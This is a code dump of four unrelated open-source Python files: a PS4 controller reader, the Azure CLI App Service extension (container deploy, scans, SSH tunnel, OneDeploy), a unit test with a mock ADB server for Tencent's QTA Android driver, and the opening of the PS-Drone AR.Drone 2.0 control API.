self.axis_data[event.axis] = round(event.value, 2)
elif event.type == pygame.JOYBUTTONDOWN:
self.button_data[event.button] = True
elif event.type == pygame.JOYBUTTONUP:
self.button_data[event.button] = False
elif event.type == pygame.JOYHATMOTION:
self.hat_data[event.hat] = event.value
def read(self):
# return the signal most recently read
return self.button_data, self.axis_data, self.hat_data
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
def get_button_command(button_data, controller):
"""Get button number from a ps4 controller.
Args:
button_data: an array of length `controller.get_numbuttons()`
controller: pygame.joystick.Joystick()
Returns:
is_command: a boolean value
button_num: button number
Button number map:
0: SQUARE
1: X
2: CIRCLE
3: TRIANGLE
4: L1
5: R1
6: L2
7: R2
8: SHARE
9: OPTIONSservoMin
10: LEFT ANALOG PRESS
11: RIGHT ANALOG PRESS
12: PS4 ON BUTTON
13: TOUCHPAD PRESS
"""
is_command = False
button_num = None
total_buttons = controller.get_numbuttons()
for num in range(total_buttons):
if button_data[num]:
is_command = True
button_num = num
break
return is_command, button_num
if __name__ == "__main__":
ps4 = PS4Controller()
ps4.start()
ps4.read()
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
from knack.log import get_logger
from knack.util import CLIError
from azure.mgmt.web.models import (AppServicePlan, SkuDescription)
from azure.cli.command_modules.appservice.custom import (
show_webapp,
_get_site_credential,
_get_scm_url,
list_publish_profiles,
get_site_configs,
update_container_settings,
create_webapp,
get_sku_name,
_check_zip_deployment_status)
from azure.cli.command_modules.appservice._appservice_utils import _generic_site_operation
from azure.cli.command_modules.appservice._create_util import (
should_create_new_rg,
create_resource_group,
web_client_factory,
should_create_new_app
)
from .acr_util import (queue_acr_build, generate_img_name)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals,too-many-statements,too-many-branches,line-too-long,import-outside-toplevel
def create_deploy_container_app(cmd, name, source_location=None, docker_custom_image_name=None, dryrun=False, registry_rg=None, registry_name=None): # pylint: disable=too-many-statements
import os
import json
if not source_location:
# the dockerfile is expected to be in the current directory the command is running from
source_location = os.getcwd()
client = web_client_factory(cmd.cli_ctx)
_create_new_rg = True
_create_new_asp = True
_create_new_app = True
_create_acr_img = True
if docker_custom_image_name:
logger.warning('Image will be pulled from DockerHub')
img_name = docker_custom_image_name
_create_acr_img = False
else:
logger.warning('Source code will be uploaded and built in Azure Container Registry')
if not registry_name:
raise CLIError("--registry-name not specified")
if not registry_rg:
raise CLIError("--registry-rg not specified")
img_name = generate_img_name(source_location)
sku = 'P1V2'
full_sku = get_sku_name(sku)
location = 'Central US'
loc_name = 'centralus'
asp = "appsvc_asp_linux_{}".format(loc_name)
rg_name = "appsvc_rg_linux_{}".format(loc_name)
# Resource group: check if default RG is set
_create_new_rg = should_create_new_rg(cmd, rg_name, True)
rg_str = "{}".format(rg_name)
dry_run_str = r""" {
"name" : "%s",
"serverfarm" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"location" : "%s"
}
""" % (name, asp, rg_str, full_sku, location)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_acr_img:
logger.warning("Starting ACR build")
queue_acr_build(cmd, registry_rg, registry_name, img_name, source_location)
logger.warning("ACR build done. Deploying web app.")
# create RG if the RG doesn't already exist
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, location)
logger.warning("Resource group creation complete")
_create_new_asp = True
else:
logger.warning("Resource group '%s' already exists.", rg_name)
_create_new_asp = _should_create_new_asp(cmd, rg_name, asp, location)
# create new ASP if an existing one cannot be used
if _create_new_asp:
logger.warning("Creating App service plan '%s' ...", asp)
sku_def = SkuDescription(tier=full_sku, name=sku, capacity=1)
plan_def = AppServicePlan(location=loc_name, app_service_plan_name=asp,
sku=sku_def, reserved=True)
client.app_service_plans.create_or_update(rg_name, asp, plan_def)
logger.warning("App service plan creation complete")
_create_new_app = True
else:
logger.warning("App service plan '%s' already exists.", asp)
_create_new_app = should_create_new_app(cmd, rg_name, name)
# create the app
if _create_new_app:
logger.warning("Creating app '%s' ....", name)
# TODO: Deploy without container params and update separately instead?
# deployment_container_image_name=docker_custom_image_name)
create_webapp(cmd, rg_name, name, asp, deployment_container_image_name=img_name)
logger.warning("Webapp creation complete")
else:
logger.warning("App '%s' already exists", name)
# Set up the container
if _create_acr_img:
logger.warning("Configuring ACR container settings.")
registry_url = 'https://' + registry_name + '.azurecr.io'
acr_img_name = registry_name + '.azurecr.io/' + img_name
update_container_settings(cmd, rg_name, name, registry_url, acr_img_name)
logger.warning("All done.")
return create_json
def _ping_scm_site(cmd, resource_group, name):
# wakeup kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
requests.get(scm_url + '/api/settings', headers=authorization)
def start_scan(cmd, resource_group_name, name, timeout="", slot=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
import requests
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
start_scan_url = scm_url + '/api/scan/start?timeout=' + timeout
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['content-type'] = 'application/octet-stream'
response = requests.get(start_scan_url, headers=authorization)
return response.json()
def get_scan_result(cmd, resource_group_name, name, scan_id, slot=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
import requests
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
scan_result_url = scm_url + '/api/scan/' + scan_id + '/result'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['content-type'] = 'application/octet-stream'
response = requests.get(scan_result_url, headers=authorization)
return response.json()
def track_scan(cmd, resource_group_name, name, scan_id, slot=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
import requests
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
scan_result_url = scm_url + '/api/scan/' + scan_id + '/track'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['content-type'] = 'application/octet-stream'
response = requests.get(scan_result_url, headers=authorization)
return response.json()
def get_all_scan_result(cmd, resource_group_name, name, slot=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
import requests
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
scan_result_url = scm_url + '/api/scan/results'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['content-type'] = 'application/octet-stream'
response = requests.get(scan_result_url, headers=authorization)
return response.json()
def stop_scan(cmd, resource_group_name, name, slot=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
import requests
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
stop_scan_url = scm_url + '/api/scan/stop'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['content-type'] = 'application/octet-stream'
requests.delete(stop_scan_url, headers=authorization)
def _get_app_url(cmd, rg_name, app_name):
site = _generic_site_operation(cmd.cli_ctx, rg_name, app_name, 'get')
return "https://" + site.enabled_host_names[0]
def _check_for_ready_tunnel(remote_debugging, tunnel_server):
default_port = tunnel_server.is_port_set_to_default()
if default_port is not remote_debugging:
return True
return False
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None):
logger.warning("remote-connection is deprecated and moving to cli-core, use `webapp create-remote-connection`")
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
logger.error("Only Linux App Service Plans supported, Found a Windows App Service Plan")
return
import time
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
user_name = next(p['userName'] for p in profiles)
user_password = next(p['userPWD'] for p in profiles)
import threading
from .tunnel import TunnelServer
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
host_name = name
if slot is not None:
host_name += "-" + slot
tunnel_server = TunnelServer('', port, host_name, user_name, user_password)
config = get_site_configs(cmd, resource_group_name, name, slot)
_ping_scm_site(cmd, resource_group_name, name)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server, config.remote_debugging_enabled))
t.daemon = True
t.start()
# Wait indefinitely for CTRL-C
while True:
time.sleep(5)
def _start_tunnel(tunnel_server, remote_debugging_enabled):
import time
if not _check_for_ready_tunnel(remote_debugging_enabled, tunnel_server):
logger.warning('Tunnel is not ready yet, please wait (may take up to 1 minute)')
while True:
time.sleep(1)
logger.warning('.')
if _check_for_ready_tunnel(remote_debugging_enabled, tunnel_server):
break
if remote_debugging_enabled is False:
logger.warning('SSH is available { username: root, password: Docker! }')
tunnel_server.start_server()
def _should_create_new_asp(cmd, rg_name, asp_name, location):
# get all appservice plans from RG
client = web_client_factory(cmd.cli_ctx)
for item in list(client.app_service_plans.list_by_resource_group(rg_name)):
if (item.name.lower() == asp_name.lower() and
item.location.replace(" ", "").lower() == location or
item.location == location):
return False
return True
# OneDeploy
def perform_onedeploy(cmd,
resource_group_name,
name,
src_path=None,
src_url=None,
target_path=None,
artifact_type=None,
is_async=None,
restart=None,
clean=None,
ignore_stack=None,
timeout=None,
slot=None):
params = OneDeployParams()
params.cmd = cmd
params.resource_group_name = resource_group_name
params.webapp_name = name
params.src_path = src_path
params.src_url = src_url
params.target_path = target_path
params.artifact_type = artifact_type
params.is_async_deployment = is_async
params.should_restart = restart
params.is_clean_deployment = clean
params.should_ignore_stack = ignore_stack
params.timeout = timeout
params.slot = slot
return _perform_onedeploy_internal(params)
# Class for OneDeploy parameters
# pylint: disable=too-many-instance-attributes,too-few-public-methods
class OneDeployParams(object):
def __init__(self):
self.cmd = None
self.resource_group_name = None
self.webapp_name = None
self.src_path = None
self.src_url = None
self.artifact_type = None
self.is_async_deployment = None
self.target_path = None
self.should_restart = None
self.is_clean_deployment = None
self.should_ignore_stack = None
self.timeout = None
self.slot = None
# pylint: enable=too-many-instance-attributes,too-few-public-methods
def _validate_onedeploy_params(params):
if params.src_path and params.src_url:
raise CLIError('Only one of --src-path and --src-url can be specified')
if not params.src_path and not params.src_url:
raise CLIError('Either of --src-path or --src-url must be specified')
if params.src_url and not params.artifact_type:
raise CLIError('Deployment type is mandatory when deploying from URLs. Use --type')
def _build_onedeploy_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
deploy_url = scm_url + '/api/publish?type=' + params.artifact_type
if params.is_async_deployment is not None:
deploy_url = deploy_url + '&async=' + str(params.is_async_deployment)
if params.should_restart is not None:
deploy_url = deploy_url + '&restart=' + str(params.should_restart)
if params.is_clean_deployment is not None:
deploy_url = deploy_url + '&clean=' + str(params.is_clean_deployment)
if params.should_ignore_stack is not None:
deploy_url = deploy_url + '&ignorestack=' + str(params.should_ignore_stack)
if params.target_path is not None:
deploy_url = deploy_url + '&path=' + params.target_path
return deploy_url
def _get_onedeploy_status_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
return scm_url + '/api/deployments/latest'
def _get_basic_headers(params):
import urllib3
from azure.cli.core.util import (
get_az_user_agent,
)
user_name, password = _get_site_credential(params.cmd.cli_ctx, params.resource_group_name, params.webapp_name, params.slot)
if params.src_path:
content_type = 'application/octet-stream'
elif params.src_url:
content_type = 'application/json'
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
headers['Content-Type'] = content_type
return headers
def _get_onedeploy_request_body(params):
import os
import json
if params.src_path:
logger.info('Deploying from local path: %s', params.src_path)
try:
with open(os.path.realpath(os.path.expanduser(params.src_path)), 'rb') as fs:
body = fs.read()
except Exception as e:
raise CLIError("Either '{}' is not a valid local file path or you do not have permissions to access it".format(params.src_path)) from e
elif params.src_url:
logger.info('Deploying from URL: %s', params.src_url)
body = json.dumps({
"packageUri": params.src_url
})
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
return body
def _update_artifact_type(params):
import ntpath
if params.artifact_type is not None:
return
# Interpret deployment type from the file extension if the type parameter is not passed
file_name = ntpath.basename(params.src_path)
file_extension = file_name.split(".", 1)[1]
if file_extension in ('war', 'jar', 'ear', 'zip'):
params.artifact_type = file_extension
elif file_extension in ('sh', 'bat'):
params.artifact_type = 'startup'
else:
params.artifact_type = 'static'
logger.warning("Deployment type: %s. To override deloyment type, please specify the --type parameter. "
"Possible values: war, jar, ear, zip, startup, script, static", params.artifact_type)
def _make_onedeploy_request(params):
import requests
from azure.cli.core.util import (
should_disable_connection_verify,
)
# Build the request body, headers, API URL and status URL
body = _get_onedeploy_request_body(params)
headers = _get_basic_headers(params)
deploy_url = _build_onedeploy_url(params)
deployment_status_url = _get_onedeploy_status_url(params)
logger.info("Deployment API: %s", deploy_url)
response = requests.post(deploy_url, data=body, headers=headers, verify=not should_disable_connection_verify())
# For debugging purposes only, you can change the async deployment into a sync deployment by polling the API status
# For that, set poll_async_deployment_for_debugging=True
poll_async_deployment_for_debugging = False
# check the status of async deployment
if response.status_code == 202:
if poll_async_deployment_for_debugging:
logger.info('Polloing the status of async deployment')
response_body = _check_zip_deployment_status(params.cmd, params.resource_group_name, params.webapp_name, deployment_status_url, headers, params.timeout)
logger.info('Async deployment complete. Server response: %s', response_body)
return
if response.status_code == 200:
return
# API not available yet!
if response.status_code == 404:
raise CLIError("This API isn't available in this environment yet!")
# check if there's an ongoing process
if response.status_code == 409:
raise CLIError("Another deployment is in progress. You can track the ongoing deployment at {}".format(deployment_status_url))
# check if an error occured during deployment
if response.status_code:
raise CLIError("An error occured during deployment. Status Code: {}, Details: {}".format(response.status_code, response.text))
# OneDeploy
def _perform_onedeploy_internal(params):
# Do basic paramter validation
_validate_onedeploy_params(params)
# Update artifact type, if required
_update_artifact_type(params)
# Now make the OneDeploy API call
logger.info("Initiating deployment")
_make_onedeploy_request(params)
return logger.info("Deployment has completed successfully")
|
test_adbclient.py
|
# -*- coding: UTF-8 -*-
#
# Tencent is pleased to support the open source community by making QTA available.
# Copyright (C) 2016THL A29 Limited, a Tencent company. All rights reserved.
# Licensed under the BSD 3-Clause License (the "License"); you may not use this
# file except in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
#
'''adbclient模块单元测试
'''
import random
import select
import socket
import struct
import tempfile
import time
import threading
import unittest
try:
from unittest import mock
except:
import mock
from qt4a.androiddriver.adbclient import ADBClient
class Context(object):
'''上下文
'''
def __init__(self):
self._device_id = None
self._file_path = None
@property
def device_id(self):
return self._device_id
@device_id.setter
def device_id(self, id):
self._device_id = id
@property
def file_path(self):
return self._file_path
@file_path.setter
def file_path(self, path):
self._file_path = path
class MockADBServer(object):
'''mock adb server
'''
def __init__(self, port=5037):
self._port = port
self._serv = socket.socket()
self._serv.bind(('127.0.0.1', self._port))
self._serv.listen(1)
self._running = True
t = threading.Thread(target=self.run)
t.setDaemon(True)
t.start()
def stop(self):
self._running = False
self._serv.close()
time.sleep(1)
def run(self):
context_dict = {}
fds = [self._serv]
while self._running:
infds, outfds, errfds = select.select(fds, [], [], 1)
if len(infds) > 0:
for fd in infds:
if fd == self._serv:
try:
sock, _ = fd.accept()
except:
continue
else:
fds.append(sock)
context_dict[sock] = Context()
else:
try:
data = fd.recv(4096)
except:
fd.close()
fds.remove(fd)
else:
if not data:
fd.close()
fds.remove(fd)
else:
response, close_conn = self.handle_input(context_dict[fd], data)
if response: fd.send(response)
if close_conn:
fd.close()
fds.remove(fd)
context_dict.pop(fd)
def handle_input(self, context, data):
'''处理输入数据
'''
try:
data_len = int(data[:4], 16)
except ValueError:
pass
else:
assert(len(data) == data_len + 4)
data = data[4:4 + data_len]
response = b'OKAY'
close_conn = False
if data == b'host:devices':
data = b'127.0.0.1:21369\tdevice'
response += b'%04x%s' % (len(data), data)
close_conn = True
elif data.startswith(b'host:transport:'):
device_id = data[15:]
context.device_id = device_id
elif data.startswith(b'host-serial:'):
pos = data.find(b':forward:')
if pos > 0:
data = data[pos + 9:]
local, remote = data.split(b';')
pos = data.find(b':get-state')
if pos > 0:
response += b'0006device'
close_conn = True
elif data.startswith(b'host:connect:'):
data = data[13:]
data = b'connected to %s' % data
response += b'%04x%s' % (len(data), data)
close_conn = True
elif data.startswith(b'host:disconnect:'):
data = b'disconnected'
response += b'%04x%s' % (len(data), data)
close_conn = True
elif data.startswith(b'shell:'):
cmdline = data[6:]
if cmdline == b'id':
response += b'uid=0(root) gid=0(root) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=kernel'
elif cmdline.startswith(b'echo'):
response += b'\r\n'
elif cmdline.startswith(b'pm '):
response += b'Failure'
else:
raise NotImplementedError(cmdline)
close_conn = True
elif data == b'sync:':
pass
elif data.startswith(b'STAT'):
data_len = struct.unpack('I', data[4:8])[0]
assert(len(data) == data_len + 8)
file_path = data[8:]
context.file_path = file_path
response = b'STAT\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
elif data.startswith(b'SEND'):
data_len = struct.unpack('I', data[4:8])[0]
assert(len(data) == data_len + 8)
response = b''
elif data.startswith(b'DATA'):
data = data[-8:-4]
if data == b'DONE':
response += b'\x00\x00\x00\x00'
close_conn = True
else:
response = b''
elif data.startswith(b'RECV'):
response = b'DATA\x04\x00\x00\x001234'
response += b'DONE\x00\x00\x00\x00'
elif data.startswith(b'DONE'):
response += b'\x00\x00\x00\x00'
close_conn = True
elif data.startswith(b'QUIT'):
response = b''
close_conn = True
elif data == b'framebuffer:':
pass
else:
print(repr(data))
raise
return response, close_conn
class TestADBClient(unittest.TestCase):
'''ADBClient类测试用例
'''
def setUp(self):
self._port = random.randint(10000, 60000)
self._mock_server = MockADBServer(self._port)
def tearDown(self):
self._mock_server.stop()
def get_client(self):
return ADBClient.get_client('127.0.0.1', self._port)
def get_device_name(self):
return '127.0.0.1:21369'
def test_devices(self):
client = self.get_client()
result = client.devices()
self.assertIn('127.0.0.1:21369\tdevice', result)
def test_shell(self):
client = self.get_client()
stdout, stderr = client.shell(self.get_device_name(), 'id', timeout=10)
self.assertIn(b'uid=0(root)', stdout)
self.assertEqual(stderr, b'')
def test_push(self):
client = self.get_client()
file_path = tempfile.mktemp('.txt')
text = '1' * 1024
with open(file_path, 'w') as fp:
fp.write(text)
result = client.push(self.get_device_name(), file_path, '/data/local/tmp/1.txt')
self.assertIn('1024 bytes in', result)
def test_pull(self):
client = self.get_client()
file_path = tempfile.mktemp('.txt')
client.shell(self.get_device_name(), 'echo 1234 > /data/local/tmp/1.txt', timeout=10)
client.pull(self.get_device_name(), '/data/local/tmp/1.txt', file_path)
with open(file_path, 'r') as fp:
text = fp.read()
self.assertEqual(text.strip(), '1234')
def test_uninstall(self):
client = self.get_client()
result = client.uninstall(self.get_device_name(), 'com.tencent.demo', timeout=20)
self.assertIn('Failure', result)
def test_forward(self):
client = self.get_client()
result = client.forward(self.get_device_name(), 'tcp:12345', 'tcp:12345')
self.assertEqual(result, '')
def test_remove_forward(self):
client = self.get_client()
client.forward(self.get_device_name(), 'tcp:12345', 'tcp:12345')
result = client.remove_forward(self.get_device_name(), 'tcp:12345')
self.assertEqual(result, '')
def test_get_state(self):
client = self.get_client()
result = client.get_state(self.get_device_name())
self.assertEqual(result, 'device')
def test_connect(self):
client = self.get_client()
result = client.connect('127.0.0.1:12345')
self.assertEqual(result, True)
running = False
def test_disconnect(self):
client = self.get_client()
result = client.disconnect('127.0.0.1:12345')
self.assertEqual(result, True)
#def test_snapshot_screen(self):
# from PIL import Image
# client = self.get_client()
# result = client.snapshot_screen(self.get_device_name())
# self.assertIsInstance(result, Image.Image)
if __name__ == '__main__':
unittest.main()
|
ps_drone.py
|
#########
# ps_drone.py
# (w)+(c) J. Philipp de Graaff, www.playsheep.de, drone@playsheep.de, 2012-2014
# Project homepage: www.playsheep.de/drone and https://sourceforge.net/projects/ps-drone/
# Dependencies: a POSIX OS, openCV2 for video-support.
# Base-program of the PS-Drone API: "An open and enhanced API for universal control of the Parrot AR.Drone 2.0 quadcopter."
##########
# Modified and advanced version, based on a part of the master of computer science degree dissertation "Universelle
# Kontrolle und Ueberwachung einer Parrot AR.Drone 2.0 auf Basis eines offenen und erweiterten Toolkits"
# by J. Philipp de Graaff, faculty of computer science, Prof. Dr. Hedrich, at the University of Frankfurt / Germany
# Linked at http://www.em.cs.uni-frankfurt.de/index.php?id=43&L=1
# For further details, information, documentation or tutorials visit: www.playsheep.de/drone
##########
# LICENCE:
# Artistic License 2.0 as seen on http://opensource.org/licenses/artistic-license-2.0 (retrieved December 2014)
# If the terms of this license do not permit the full use that you propose to make of PS-Drone, please contact me for a
# different licensing arrangement.
# Visit www.playsheep.de/drone or see the PS-Drone-API-documentation for an abstract from the Artistic License 2.0.
##########
# Dedicated to my beloved wife.
###########
import threading, select, socket, time, tempfile, multiprocessing, struct, os, sys
import thread, signal, subprocess
if os.name == 'posix': import termios, fcntl # for getKey(), ToDo: Reprogram for Windows
commitsuicideV, showVid, vCruns, lockV, debugV = False, False, False, threading.Lock(), False # Global variables for video-decoding
offsetND, suicideND, commitsuicideND = 0, False, False # Global variables for NavDava-decoding
class Drone(object):
######################################=-
### Start and stop using the drone ###=-
######################################=-
###### Bootup and base configuration
def __init__(self):
self.__Version = "2.0.1"
self.__lock = threading.Lock() # To prevent semaphores
self.__startTime = time.time()
self.__speed = 0.2 # Default drone moving speed in percent.
self.showCommands = False # Shows all sent commands (but not the keepalives)
self.debug = False # Shows some additional debug information
self.valueCorrection = False
self.selfRotation = 0.0185 # use this value, if not checked by getSelfRotation()
self.stopOnComLoss = False # when there is a communication-problem, drone will land or not
# Drone communication variables
self.DroneIP = "192.168.1.1"
self.NavDataPort = 5554
self.VideoPort = 5555
self.CmdPort = 5556
self.CTLPort = 5559
# NavData variables
self.__NavData = ""
self.__State = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
self.__NavDataCount = 0
self.__NavDataTimeStamp = 0.0
self.__NavDataDecodingTime = 0.0
self.__NoNavData = False
# Video variables
self.__VideoImage = None
self.__VideoImageCount = 0
self.__VideoDecodeTimeStamp = 0
self.__VideoDecodeTime = 0
self.__VideoReady = False
self.__vKey = ""
self.__SaveVideo = False
# Config variables
self.__ConfigData = []
self.__ConfigDataCount = 0
self.__ConfigDataTimeStamp = 0
self.__ConfigSending = True
self.__ConfigSessionID = "03016321"
self.__ConfigUserID = "0a100407"
self.__ConfigApplicationID = "03016321"
self.sendConfigSaveMode = False
# Internal variables
self.__NavDataProcess = ""
self.__VideoProcess = ""
self.__vDecodeProcess = ""
self.__ConfigQueue = []
self.__networksuicide = False
self.__receiveDataRunning = False
self.__sendConfigRunning = False
self.__shutdown = False
self.__pDefaultStr = "\033[0m"
self.__pRedStr = "\033[91m"
self.__pGreenStr = "\033[92m"
self.__pYellowStr = "\033[93m"
self.__pBlueStr = "\033[94m"
self.__pPurpleStr = "\033[95m"
self._show_pLineUpStr = "\033[1A"
def getImage(self):
vPath = self.__VidPipePath
capture = cv2.VideoCapture(vPath)
success, image = capture.read()
return image
##################################
#img_process(image)
###### Connect to the drone and start all procedures
def startup(self):
# Check for drone in the network and wake it up
try:
socket.socket().connect((self.DroneIP, 21))
socket.socket().close()
except:
self.printRed()
print "Drone is not online"
self.printDefault()
sys.exit(9)
# Internal variables
self.__CmdCounter = 3 # as there are two raw commands, send next steps
self.__calltime = 0 # to get some time-values to debug
#send the first four initial-commands to the drone
self.__sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # Open network connection
self.__sock.setblocking(0) # Network should not block
self.__sendrawmsg("\r") # Wakes up command port
time.sleep(0.01)
self.__sendrawmsg("AT*PMODE=1,2\rAT*MISC=2,2,20,2000,3000\r") # Initialising drone as sniffed from datastream demo-tool to AR.Drone
##### Initialising timed thread(s) for drone communication
# Opening NavData- and Video- Processes
self.__VidPipePath = tempfile.gettempdir()+"/dronevid-"+str(threading.enumerate()[0])[-12:-2]+"-"+str(time.time())[-7:].replace(".","")+".h264"
self.__net_pipes = []
self.__NavData_pipe, navdataChild_pipe = multiprocessing.Pipe()
self.__Video_pipe, videoChild_pipe = multiprocessing.Pipe()
self.__vdecode_pipe, self.__vdecodeChild_pipe = multiprocessing.Pipe()
self.__NavDataProcess = multiprocessing.Process( target=mainloopND, args=(self.DroneIP,self.NavDataPort,navdataChild_pipe,os.getpid()))
self.__NavDataProcess.start()
self.__VideoProcess = multiprocessing.Process( target=mainloopV, args=(self.DroneIP,self.VideoPort,self.__VidPipePath,videoChild_pipe,os.getpid()))
self.__VideoProcess.start()
self.__vDecodeProcess = multiprocessing.Process( target=vDecode, args=(self.__VidPipePath,self.__vdecodeChild_pipe,os.getpid()))
# There is a third process called "self.__vDecodeProcess" for decoding video, initiated and started around line 880
# Final settings
self.useDemoMode(True) # This entry is necessary for the drone's firmware, otherwise the NavData contains just header and footer
self.setConfig("custom:session_id","-all")
self.getNDpackage(["demo"])
time.sleep(1)
#setup Network-thread
while not self.__receiveDataRunning or not self.__sendConfigRunning or len(self.__ConfigQueue): # sometimes they would not start why ever, so TK has to double-check
if not self.__receiveDataRunning:
self.__threadReceiveData=threading.Thread(target=self.__receiveData)
self.__threadReceiveData.start()
time.sleep(0.05)
if not self.__sendConfigRunning:
self.__threadSendConfig=threading.Thread(target=self.__sendConfig)
self.__threadSendConfig.start()
time.sleep(0.05)
time.sleep(0.01)
###### Clean Shutdown
def shutdown(self):
if self.__shutdown: sys.exit()
self.__shutdown = True
if self.debug: print "Shutdown..."
self.land()
self.thrust(0,0,0,0)
try: self.__NavData_pipe.send("die!")
except: pass
self.__Video_pipe.send("uninit")
t=time.time()
while self.__VideoReady and (time.time()-t)<5: time.sleep(0.1)
try: self.__Video_pipe.send("die!")
except: pass
time.sleep(0.5)
try: self.__VideoProcess.terminate()
except: pass
try: self.__vDecodeProcess.terminate()
except: pass
try: self.__NavDataProcess.terminate()
except: pass
self.__stopnetwork()
try: self.__threadSendConfig.join()
except: pass
try: self.__threadReceiveData.join()
except: pass
self.__keepalive.cancel()
sys.exit()
##############################################################=-
### Make internal variables to external read-only variables ###=-
##############################################################=-
@property
def Version(self): return self.__Version
@property
def startTime(self): return self.__startTime
@property
def speed(self): return self.__speed
@property
def NavData(self): return self.__NavData
@property
def State(self): return self.__State
@property
def NavDataCount(self): return self.__NavDataCount
@property
def NavDataTimeStamp(self): return self.__NavDataTimeStamp
@property
def NavDataDecodingTime(self): return self.__NavDataDecodingTime
@property
def NoNavData(self): return self.__NoNavData
@property
def VideoImage(self): return self.__VideoImage
@property
def VideoImageCount(self): return self.__VideoImageCount
@property
def VideoDecodeTimeStamp(self): return self.__VideoDecodeTimeStamp
@property
def VideoDecodeTime(self): return self.__VideoDecodeTime
@property
def VideoReady(self): return self.__VideoReady
@property
def SaveVideo(self): return self.__SaveVideo
@property
def ConfigData(self): return self.__ConfigData
@property
def ConfigDataCount(self): return self.__ConfigDataCount
@property
def ConfigDataTimeStamp(self): return self.__ConfigDataTimeStamp
@property
def ConfigSending(self): return self.__ConfigSending
@property
def ConfigSessionID(self): return self.__ConfigSessionID
@property
def ConfigUserID(self): return self.__ConfigUserID
@property
def ConfigApplicationID(self): return self.__ConfigApplicationID
######################=-
### Drone commands ###=-
######################=-
###### Commands for configuration
# change some value
def setConfig(self, name, value): # e.g. drone.setConfig(control:altitude_max","5000")
self.__ConfigQueue.append([str(name), str(value), False]) # Note: changes are not immediately and could take some time
# change some value and send the configuration Identifier (sendConfigIDs) ahead
def setMConfig(self, name, value): # Usage like setConfig
self.__ConfigQueue.append([str(name), str(value), True]) # Note: changes are not immediately and could take some time
# get actual configuration
def getConfig(self): # Stored in "ConfigData"
self.at("CTRL", [5,0]) # Wow, that is new, was not necessary before
self.at("CTRL", [4,0]) # Note: Actual configuration data will be received after setting...
if self.showCommands: self.__calltime = time.time() # ... automatically. An update will take up to 0.015 sec)
# setting IDs to store Konfigurations for later
def setConfigSessionID(self, *args):
try:
value = float(args[0])
self.__ConfigSessionID = normalLen8(value)
